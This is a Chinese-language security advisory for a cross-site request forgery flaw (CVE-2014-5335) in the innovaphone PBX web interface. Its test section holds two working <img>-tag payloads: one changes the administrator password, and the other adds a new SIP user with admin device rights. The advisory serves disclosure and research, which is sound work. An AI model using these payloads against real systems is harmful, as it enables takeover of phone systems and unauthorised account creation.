innovaphone PBX跨站请求伪造漏洞(CVE-2014-5335)
发布日期:2014-08-21
更新日期:2014-08-25
受影响系统:innovaphone PBX
描述:
BUGTRAQ ID:
69350
CVE(CAN) ID:
CVE-2014-5335
innovaphone PBX是专业的VoIP电话系统。
innovaphone PBX使用Web用户接口,该接口没有检查请求来源是否可靠,在实现上存在跨站请求伪造漏洞,成功利用CSRF漏洞后可使攻击者能够远程更改任何配置。
<*来源:Rainer Giedat
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
将PBX管理员密码更改为'hacked':
<img src="http://<<PBX>>/CMD0/mod_cmd.xml?cmd=form&redirect=mod_cmd.xml%3Fxsl
%3Dcommand.xsl&name=&user=admin&password=hacked&password2=hacked&help=&a
dd.user=&add.pwd=&add.pwd2=&add.level=0&add.end=&kdc.realm=&kdc.address1
=&kdc.port1=&kdc.adminport1=&kdc.address2=&kdc.port2=&kdc.adminport2=&kd
c.end=&op=OK"></img>
可以添加新SIP用户:
<img src="http://<<PBX>>/PBX0/ADMIN/mod_cmd_login.xml?cmd=submit-object&xsl=p
bx_edit_user.xsl&tab-active=&guid=&repsrc=&search-grp=&text=&cn=Hans+Dam
pf&dn=Hans+Dampf&h323=Hans+Dampf&e164=666&email=&pwd=hans&pwd1=hans&node
=root&loc=Opfer&fake=&obj-url=&gi=&config=&no-devs=update&dev1.hw=&dev1.
text=&dev1.admin=on&dev1.no-filter=on&dev1.reg=on&filter=&cd-filter=&cfn
r=&busy-out=&uc=&gw.name=&gw.ipei=&gw.dsp=&gw.ac=&gw.subs=&gw.fc=&gw.cki
=&gw.ciph=&gw.end=.&save=Apply"></img>
建议:
厂商补丁:
innovaphone
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.innovaphone.com/浏览次数:2093
严重程度:0(网友投票)
